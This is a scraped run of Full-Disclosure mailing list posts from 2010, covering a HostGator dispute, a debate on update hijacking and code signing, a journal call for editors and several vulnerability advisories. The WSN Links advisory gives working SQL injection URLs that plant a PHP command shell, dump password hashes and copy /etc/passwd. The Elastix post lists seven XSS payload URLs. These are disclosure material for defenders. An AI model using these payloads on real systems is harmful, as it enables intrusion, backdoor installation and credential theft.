[Full-disclosure] Fw: hostgator
Hi Brent, I'm doing good too, thanks. Sorry for the delay. You own a multi-million dollar hosting business and your mail hit my spam box. Making Good Money With HostGator. 2010-10-30. http://www.blackhatworld.com/blackhat-seo/making-money/176979-making-good-money-hostgator.html http://bit.ly/9pT1G4 Accessed: 2010-10-30. (Archived by WebCite® at http://www.webcitation.org/5ts7nfD9b) Let's say these sponsored conversations mentioned are not created by your management or company and all in fact affiliates: Just because they are affiliates doesn't make you less culpable for the noise your business causes. You are allowing the net with garbage and puff pieces posing as authentic reviews of your business. You run a hub for affiliate link spam. Your business is a call center filled with monkeys paid at minimum wage where you cram clients into ungodly spaces on ancient web 1.0 software. How is this different from spamming porn or viagra? The only difference is it's crappy hosting. You haven't denied your online advertising budget on Google not being 7figs. While mentioning affiliates, you did not deny you didn't market yourself, only the denied the subjective term Google bombing. I am not quickly seeing you're not google bombing. You're not the only company guilty of this, you're right that the other garbage web hosts like 1and1, bluehost and etc. play similar games. Look, McDonalds gets clients, Walmart gets clients, but they rely on cost, product and dependability, while your type is cram n' cruft. I am working on a new exposé on a penny auction site scheme that uses similar marketing techniques called quibids (and their copycats). Will expose mass-sock puppetry and of course fraud. Should be ready next week. --- On Sat, 10/30/10, br...@hostgator.com br...@hostgator.com wrote: From: br...@hostgator.com br...@hostgator.com Subject: hostgator To: hg_expo...@yahoo.com Date: Saturday, October 30, 2010, 4:59 AM Hi Joey, I just read http://seclists.org/fulldisclosure/2010/Oct/466?utm_source=twitterfeedutm_medium=twitter We have over 400,000 customers with the majority of them being extremely happy with us. I'd be happy to send you over our net promoter score if you familiar with this and interested to prove this. It is true that we have many ex employees that aren't happy with us, as well as many current. We let our customers decide who we terminate, who gets, raises, as well as who gets promotions based on customer ratings. We have about 450 employees currently. In the last year alone we've had to fire somewhere around 250 employees. We lost about another 20 to other companies as well as people moving for personal reasons. I could find out exact numbers on this if you are interested. Employees who are rated well by our customers are usually very happy with us, employees who are rated poorly usually aren't as we actively document their write ups until they either improve or we are forced to terminate them. A lot of what you documented is true as well as much of it being completely false. We have never google bombed. What you are seeing are many affiliate sites that are created by our 10,000+ affiliates. Many of them are hosted with us and very happy with our services. There are also many that are just trying to make a sale and have never used our services. I'd say a good portion of this group push us as well as our major competitors that have an affiliate program. If you do a little more research you will quickly find that hostgator does not participate in google bombing. All in all your review seems to nothing more then a smear campaign. It would be nice if you gave us a fair review by actually testing our service after all wouldn't that be truly exposing us? -- Sincerely, Brent Oxley Owner and Founder HostGator.com, LLC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
Just signing the update packages prevents this attack, so it's not that hard to fix. On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote: On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said: It's now a time for vendors to re-consider their updating scheme. And do what differently, exactly? OK, so it's *possible* to fake out the iTunes update process. But which is easier and more productive: A) Laying in wait for some random to think Wow, I should update iTunes and hijack the process. B) Send out a few hundred thousand spam with a ' From:upd...@apple-itunes-support.comfrom%3aupd...@apple-itunes-support.com ' with a link to a site you control and feed the the sheep some malware. Evilgrade looks like a nice tool to have if you're doing a pen test or a targeted attack and can somehow get the victim to do an update (possibly social engineering), but for any software vendor feeding software updates to Joe Sixpack this threat model is *so* far down the list it isn't funny. Simply compare the number of boxes pwned by (A) and (B) - how many people have gotten pwned because somebody hijacked their update from Symantec or wherever, compared to the number pwned because they got a popup that said Your computer is infected, click here to fix it? Remember - just because a new tool useful for an attacker shows up, does *not* mean it's a game changer for the industry at large. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Call for Associate Editors and reviewers: Advances in Network and Communications
Call for Associate Editors and reviewers Advances in Network and Communications ISSN: 2093-4734 http://www.humanpub.org/anc/index.html Advances in Network and Communications is an online international journal, published by Human and Sciences Publication (HumanPub). All papers published in this journal will be permanently available online without charge. Advances in Network and Communications is published two times in a year. The goal of the ANC is to publish peer reviewed original research result-oriented, practical, theoretical, survey, review, tutorial papers in the various fields of Network and Communications. High quality submissions that advance the research and that contribute something new to the literature on Computing Information Technology and Telecommunications are encouraged. The special focus of the ANC forum is to publish path-breaking applications and applied research results in the network and communication areas. Topics such as Security and cryptographic algorithms communication, QoS, Ad-Hoc and Sensor networks, P2P, CDNs, Wireless Networks, Mobile and Dynamic Networks, Mesh networks, VoIP, IPTV, Cognitive Radio Networks, Optical networks, Green Computing networks, Power Efficient and Energy Saving Networks, Distributed/Decentralized Networks are covered (but not limited to) in this journal. You are welcome to send this call for Associate Editors and reviewers to the mailing lists you belong to and any people working in Network and Communications that may be interested in working on the dissemination of the research papers in this area. You can submit your short CV to the editor in chief (jllo...@dcom.upv.es), or to ask for any information or to send your suggestions. Alejandro Cánovas Solbes Assistant of the Journal Advances in Network and Communications Polytechnic University of Valencia, Spain ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
Only thing, there's the danger of someone using stolen certificates. But I'm sure there's another fix for that. In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. Just my 2 cents... Chris. On Sun, Oct 31, 2010 at 1:09 PM, Mario Vilas mvi...@gmail.com wrote: Just signing the update packages prevents this attack, so it's not that hard to fix. On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote: On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said: It's now a time for vendors to re-consider their updating scheme. And do what differently, exactly? OK, so it's *possible* to fake out the iTunes update process. But which is easier and more productive: A) Laying in wait for some random to think Wow, I should update iTunes and hijack the process. B) Send out a few hundred thousand spam with a ' From:upd...@apple-itunes-support.comfrom%3aupd...@apple-itunes-support.com ' with a link to a site you control and feed the the sheep some malware. Evilgrade looks like a nice tool to have if you're doing a pen test or a targeted attack and can somehow get the victim to do an update (possibly social engineering), but for any software vendor feeding software updates to Joe Sixpack this threat model is *so* far down the list it isn't funny. Simply compare the number of boxes pwned by (A) and (B) - how many people have gotten pwned because somebody hijacked their update from Symantec or wherever, compared to the number pwned because they got a popup that said Your computer is infected, click here to fix it? Remember - just because a new tool useful for an attacker shows up, does *not* mean it's a game changer for the industry at large. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
On Sun, 31 Oct 2010 13:09:27 BST, Mario Vilas said: Just signing the update packages prevents this attack, so it's not that hard to fix. Except if a signing key gets compromised, as happened to one Linux vendor recently, causing a lot of kerfluffle... Setting up a proper signing system involves a certain amount of actual cost and effort. And every organization that produces code, be it for-profit proprietary code or free open-source code, has to make resource tradeoffs. Is there any actual *evidence* that hijacking authorized updates is a big enough problem to be worth it? If each year, 5 of their customers get pwned by the sort of attack that Evilgrade does, but 50,000 get pwned by click here popups that code signing won't do squat to prevent, is it really worth their time and effort? Sure, sucks to be one of the 5, but if they instead spend the resources to do something *else* to make their customer's lives better that would benefit thousands rather than the 5 pgpUCLhkyNsSF.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
On Sun, 31 Oct 2010 14:24:59 BST, Christian Sciberras said: In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. Amen to that. A more subtle issue is the tradeoff issue: Any time they have a code engineer spending time building and feeding that code-signing infrastructure is time that code engineer *isn't* spending writing actual new features the users *want*. Which user-requested feature are you going to heave over the side in order to do code-signing instead? That question has to enter into the calculus as well. pgp8DYqFT5Rbt.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
Hm, I'm new to this list. so I find this a bit strange. Christian, Vladis, are you the same person? what are your motives? do you really believe the things you are saying? you seem to be just generally negative, jumping from point to point and being very silly. Just signing the update packages prevents this attack, so it's not that hard to fix. In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. there is a REAL attack vector that needs to be fixed, and you are saying that it shouldn't be fixed as every line of code creates a POTENTIAL attack vector? Only thing, there's the danger of someone using stolen certificates. a signing key might be stolen, so we shouldn't use it? do you use passwords chris? why? they might be stolen? you can't possibly believe that? Amen to that. A more subtle issue is the tradeoff issue: Any time they have a code engineer spending time building and feeding that code-signing infrastructure is time that code engineer *isn't* spending writing actual new features the users *want*. code-signing infrastructure? ofcourse, code for those things is well known, packed in libraries, and trivial to use. ofcourse. and... and bla. I could go on, but probbably the whole list is aware of those things. I'm wondering what's going on? are you payed list-posters from an evil rival company? this is the only idea I have. * valdis.kletni...@vt.edu (valdis.kletni...@vt.edu) wrote: On Sun, 31 Oct 2010 14:24:59 BST, Christian Sciberras said: In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. Amen to that. A more subtle issue is the tradeoff issue: Any time they have a code engineer spending time building and feeding that code-signing infrastructure is time that code engineer *isn't* spending writing actual new features the users *want*. Which user-requested feature are you going to heave over the side in order to do code-signing instead? That question has to enter into the calculus as well. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- PGP 0x96085C00 http://lesh.sysphere.org pgpPfmit3xWx5.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: xss in elastix
Oh look I think bugtraq hates me more lame xss in yet another voip management user interface for asterisk... -- Forwarded message -- From: dave b db.pub.m...@gmail.com Date: 29 October 2010 03:36 Subject: xss in elastix To: bugt...@securityfocus.com xss in elastix(http://www.elastix.org/) , 1. https://10.0.20.226/index.php?menu=packagesnombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3EsubmitInstalado=installedsubmit_nombre=Search 2. https://10.0.20.226/?menu=pbxconfigdisplay=recordingsSubmit=Godisplay=recordingsusersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E 3. https://10.0.20.226/index.php?menu=cdrreportdate_end=28%20Oct%202010date_start=28%20Oct%202010field_name=dstfield_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Efilter=Filterstatus=ALL 4. https://10.0.20.226/index.php?menu=asterisk_logfilter=2010-10-28offset=0busqueda=ultima_busqueda=ultimo_offset=busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3Efilter=2010-10-28offset=0show=Showultima_busqueda=ultimo_offset= 5. https://10.0.20.226/index.php?menu=summary_by_extensionoption_fil=value_fil=date_from=28date_from=28%20Oct%202010date_to=28%20Oct%202010option_fil=Extshow=Showvalue_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E 6. https://10.0.20.226/index.php?menu=grouplistaction=viewid=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E 7. https://10.0.20.226/index.php?menu=group_permissionfilter_group=1filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions...
Hi, everyone! As so many highlights have been given on Intrusion Detection System and Intrusion Prevention System evasions (?) last week, I decided to send this message just to let you all know that I published a brand-new sample video, demonstrating two Exploit Next GenerationR example modules, successfully evading: . SNORT 2.8.6 detection for MS02-056 vulnerability. . SURICATA 0.9.0 detection for MS08-078 vulnerability. Here is the YouTube video: . http://www.youtube.com/watch?v=iHgtf4PXqeU PS: So, Intrusion Detection System and Intrusion Prevention System evasions are not that BIG NEWS, at least not for the H2HC Sixth Edition's audience. Before someone asks what the similarities and/or differences between Exploit Next GenerationR (ENG++) and Advanced Evasion Techniques (AET), let me get this clear: . ENG++ has a different approach and has no similarity to AET, despite the fact that both of them can be used to bypass IDS and IPS technology. Besides, ENG++ is a much older research. . ENG++ was first designed in 2004, coded in 2005, published in 2008 ( http://packetstormsecurity.org/papers/general/ENG_in_a_nutshell.pdf Exploit creation - The random approach or Playing with random to build exploits), and became a methodology in 2009 ( http://www.h2hc.com.br/repositorio/2009/files/Nelson.en.pdf The Departed: Exploit Next Generation - The Philosophy). . ENG++ became a methodology when I decided to port it to work with/to any open exploit development framework, i.e., Metasploit Framework. . Ported means that ENG++ has been developed for a long, long, long time, so just some modules is working on Metasploit Framework to release some of its example and to help people understanding that really cool stuff can be done when you are innovating and creating. In a few words: Exploit Next GenerationR Compliance Methodology is not the same thing as Advanced Evasion Techniques (ENG++ != AET). For further information, please, visit the URL: . http://j.mp/ExploitNG For online information and news about Exploit Next GenerationR Compliance Methodology, please, follow @Exploit_NG http://twitter.com/Exploit_NG on Twitter. Cheers. Nelson Brito Security Researcher http://fnstenv.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur. II. AFFECTED VERSIONS --- 6.0.1; 5.1.51 ; 5.0.81 III. TESTED VERSIONS --- 5.1.40 5.1.49 IV. PoC EXPLOITS --- 1) A 'UNION SELECT' which results in a PHP shell-execution script http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20?php%20system($_REQUEST[cmd]);%20?%20INTO%20OUTFILEnamesearch=/var/www/exec.phpaction=filterfilled=1whichtype=categories 2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILEnamesearch=/var/www/pass.txtaction=filterfilled=1whichtype=categories 3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILEnamesearch=/var/www/passwd.txtaction=filterfilled=1whichtype=categories V. NOTES --- * The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work. * Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection. * There is potential to exploit this vulnerability which outputs user data directly to the browser. * Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments. VI. SOLUTION --- Upgrade to the most recent version of your 'WSN Links' code branch. VII. REFERENCES --- http://www.wsnlinks.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006 http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/ VIII. TIMELINE --- 10/10/2010: Initial discloure e-mail to the vendor 10/18/2010: Follow-up via the vendor's contact web form 10/18/2010: Vendor acknowledgement/commitment to fix 10/21/2010: Patched versions released 10/31/2010: Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
Christian, Vladis, are you the same person? [sarcasm] Yes we are, it's a personality disorder issue. ;-) [/sarcasm] what are your motives? What would one's be a motive to a discussion? do you really believe the things you are saying? [sarcasm] No, I was just trying to sound cool going against most FD readers out there. [/sarcasm] you seem to be just generally negative, jumping from point to point and being very silly. Negative? Is asking a change in the standards saves us religion, being negative? What seems silly to you might be sane and true to the rest of the world. Oh and, maybe you're overly meditative to see several points in my postlet me confess something there was only ONE point. there is a REAL attack vector that needs to be fixed, and you are saying that it shouldn't be fixed as every line of code creates a POTENTIAL attack vector? Remember stuxnet? and it's use of stolen certificates? a signing key might be stolen, so we shouldn't use it? I've never said it's not. do you use passwords chris? why? they might be stolen? Yes, I do. Ever heard of hacking/stealing an account? you can't possibly believe that? Uhm, yes I do. I'm wondering what's going on? are you payed list-posters from an evil rival company? this is the only idea I have. Wow, so daft. Is someone on this damned list entitled to an opinion or a fair discussion? As to your theory, one question, which rival company (to those companies)? I think that you're mostly confused as to what the point is. There are places where code should be signed and there are places where it shouldn't. Evilgrade did reveal that some of these places aren't as they should, but this does not mean any and all sorts of updates should be signed. The trade-of Valdis mentioned is one of my main deterrents to create such an updating system; why would I hand out the money for code signing when the ROI doesn't even cover it?? One thing, you ought to think on; why aren't user-based sites ask for a PGP signature? Why do they use a simple password mechanism (if at all)? PS: Keep up with the conspiracy theories, got to love 'em. Cheers, Chris. On Sun, Oct 31, 2010 at 5:07 PM, [lesh] Ivan Nikolic l...@sysphere.orgwrote: Hm, I'm new to this list. so I find this a bit strange. Christian, Vladis, are you the same person? what are your motives? do you really believe the things you are saying? you seem to be just generally negative, jumping from point to point and being very silly. Just signing the update packages prevents this attack, so it's not that hard to fix. In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. there is a REAL attack vector that needs to be fixed, and you are saying that it shouldn't be fixed as every line of code creates a POTENTIAL attack vector? Only thing, there's the danger of someone using stolen certificates. a signing key might be stolen, so we shouldn't use it? do you use passwords chris? why? they might be stolen? you can't possibly believe that? Amen to that. A more subtle issue is the tradeoff issue: Any time they have a code engineer spending time building and feeding that code-signing infrastructure is time that code engineer *isn't* spending writing actual new features the users *want*. code-signing infrastructure? ofcourse, code for those things is well known, packed in libraries, and trivial to use. ofcourse. and... and bla. I could go on, but probbably the whole list is aware of those things. I'm wondering what's going on? are you payed list-posters from an evil rival company? this is the only idea I have. * valdis.kletni...@vt.edu (valdis.kletni...@vt.edu) wrote: On Sun, 31 Oct 2010 14:24:59 BST, Christian Sciberras said: In my opinion, all in all, you're creating a yet another overly complex system with as yet more possible flaws. Don't forget tat each new line of code is a potential attack vector which affects any system. Amen to that. A more subtle issue is the tradeoff issue: Any time they have a code engineer spending time building and feeding that code-signing infrastructure is time that code engineer *isn't* spending writing actual new features the users *want*. Which user-requested feature are you going to heave over the side in order to do code-signing instead? That question has to enter into the calculus as well. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- PGP 0x96085C00 http://lesh.sysphere.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted
[Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
1. VULNERABILITY DESCRIPTION Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These flaws were reported along with our Cross Scripting Flaw which was fixed in 1.5.21. Developers believed that our reported SQL Injection flaws are not fully exploitable because of Joomla! built-in string filters and were not fixed in 1.5.21 which is currently the latest version. As a result, we disclosed these flaws in order for someone who can exploit these flaws to the next maximum level. 2. PROOF-OF-CONCEPT/EXPLOIT http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg 3. DISCLOSURE TIME-LINE 2010-10-06 : Notified Joomla! Security Strike Team 2010-11-01 : Vulnerability disclosed 4. VENDOR Joomla! Developer Team http://www.joomla.org http://www.joomla.org/download.html # YGN Ethical Hacker Group # http://yehg.net # 2010-11-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
It's now a time for vendors to re-consider their updating scheme. And do what differently, exactly? To name a few, developers can do code signing, ssl certificates verification like our favorite Firefox and methods used by AV vendors. There have been cheap/free SSL certificate vendors like startssl. This task should/would not be a huge pain. It's that simple. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
According to your site, you want to entice young Burmese people into ethical hacking and raise students' interest in security/hacking in an ethical manner, yet you disclosed these flaws in order for someone who can exploit these flaws to the next maximum level? Douche. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical Hacker Group Sent: Sunday, October 31, 2010 12:19 PM To: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com; b...@securitytracker.com; v...@secunia.com; secal...@securityreason.com; n...@securiteam.com; v...@security.nnov.ru Subject: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws 1. VULNERABILITY DESCRIPTION Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These flaws were reported along with our Cross Scripting Flaw which was fixed in 1.5.21. Developers believed that our reported SQL Injection flaws are not fully exploitable because of Joomla! built-in string filters and were not fixed in 1.5.21 which is currently the latest version. As a result, we disclosed these flaws in order for someone who can exploit these flaws to the next maximum level. 2. PROOF-OF-CONCEPT/EXPLOIT http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg 3. DISCLOSURE TIME-LINE 2010-10-06 : Notified Joomla! Security Strike Team 2010-11-01 : Vulnerability disclosed 4. VENDOR Joomla! Developer Team http://www.joomla.org http://www.joomla.org/download.html # YGN Ethical Hacker Group # http://yehg.net # 2010-11-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
P.S. You don't sanitize input on your Subscribe for Updates post before sending it to Feedburner. You know, the one located in http://yehg.net/lab/#home; across from your XSS attack demo on Joomla! log update. It's trivial to generate Trouble at the mill! FeedBurner encountered some kind of error performing the task or displaying the page you requested. Fear not, this event has notified the appropriate people within FeedBurner and we will have this all ironed out soon. I'm sure there are people on the list here that can help you with that. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Sunday, October 31, 2010 1:35 PM To: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com; b...@securitytracker.com; v...@secunia.com; secal...@securityreason.com; n...@securiteam.com; v...@security.nnov.ru Subject: Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws According to your site, you want to entice young Burmese people into ethical hacking and raise students' interest in security/hacking in an ethical manner, yet you disclosed these flaws in order for someone who can exploit these flaws to the next maximum level? Douche. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical Hacker Group Sent: Sunday, October 31, 2010 12:19 PM To: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com; b...@securitytracker.com; v...@secunia.com; secal...@securityreason.com; n...@securiteam.com; v...@security.nnov.ru Subject: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws 1. VULNERABILITY DESCRIPTION Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These flaws were reported along with our Cross Scripting Flaw which was fixed in 1.5.21. Developers believed that our reported SQL Injection flaws are not fully exploitable because of Joomla! built-in string filters and were not fixed in 1.5.21 which is currently the latest version. As a result, we disclosed these flaws in order for someone who can exploit these flaws to the next maximum level. 2. PROOF-OF-CONCEPT/EXPLOIT http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg 3. DISCLOSURE TIME-LINE 2010-10-06 : Notified Joomla! Security Strike Team 2010-11-01 : Vulnerability disclosed 4. VENDOR Joomla! Developer Team http://www.joomla.org http://www.joomla.org/download.html # YGN Ethical Hacker Group # http://yehg.net # 2010-11-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws
To clarify, we want excellent guys here to prove/bypass/exploit the potential issues to enforce developers to fix rather than hiding these issues. That's what we want to say. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: [DEMO] Sample videos about IDS/IPS evasions...
-- Forwarded message -- From: Nelson Brito nbr...@sekure.org Date: Mon, Nov 1, 2010 at 5:40 AM Subject: RE: [Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions... To: Jacky Jack jacksonsmth...@gmail.com http://vimeo.com/16371447 Use this instead!!! -Original Message- From: Jacky Jack [mailto:jacksonsmth...@gmail.com] Sent: Sunday, October 31, 2010 5:43 PM To: Nelson Brito Subject: Re: [Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions... This video has been removed as a violation of YouTube's policy against spam, scams, and commercially deceptive content. On Sat, Oct 30, 2010 at 4:47 AM, Nelson Brito nbr...@sekure.org wrote: Hi, everyone! As so many highlights have been given on Intrusion Detection System and Intrusion Prevention System evasions (?) last week, I decided to send this message just to let you all know that I published a brand-new sample video, demonstrating two Exploit Next Generation® example modules, successfully evading: · SNORT 2.8.6 detection for MS02-056 vulnerability. · SURICATA 0.9.0 detection for MS08-078 vulnerability. Here is the YouTube video: · http://www.youtube.com/watch?v=iHgtf4PXqeU PS: So, Intrusion Detection System and Intrusion Prevention System evasions are not that BIG NEWS, at least not for the H2HC Sixth Edition's audience. Before someone asks what the similarities and/or differences between Exploit Next Generation® (ENG++) and Advanced Evasion Techniques (AET), let me get this clear: · ENG++ has a different approach and has no similarity to AET, despite the fact that both of them can be used to bypass IDS and IPS technology. Besides, ENG++ is a much older research. · ENG++ was first designed in 2004, coded in 2005, published in 2008 (“Exploit creation - The random approach” or “Playing with random to build exploits”), and became a methodology in 2009 (“The Departed: Exploit Next Generation – The Philosophy”). · ENG++ became a methodology when I decided to port it to work with/to any open exploit development framework, i.e., Metasploit Framework. · Ported means that ENG++ has been developed for a long, long, long time, so just some modules is working on Metasploit Framework to release some of its example and to help people understanding that really cool stuff can be done when you are innovating and creating. In a few words: Exploit Next Generation® Compliance Methodology is not the same thing as Advanced Evasion Techniques (ENG++ != AET). For further information, please, visit the URL: · http://j.mp/ExploitNG For online information and news about Exploit Next Generation® Compliance Methodology, please, follow @Exploit_NG on Twitter. Cheers. Nelson Brito Security Researcher http://fnstenv.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
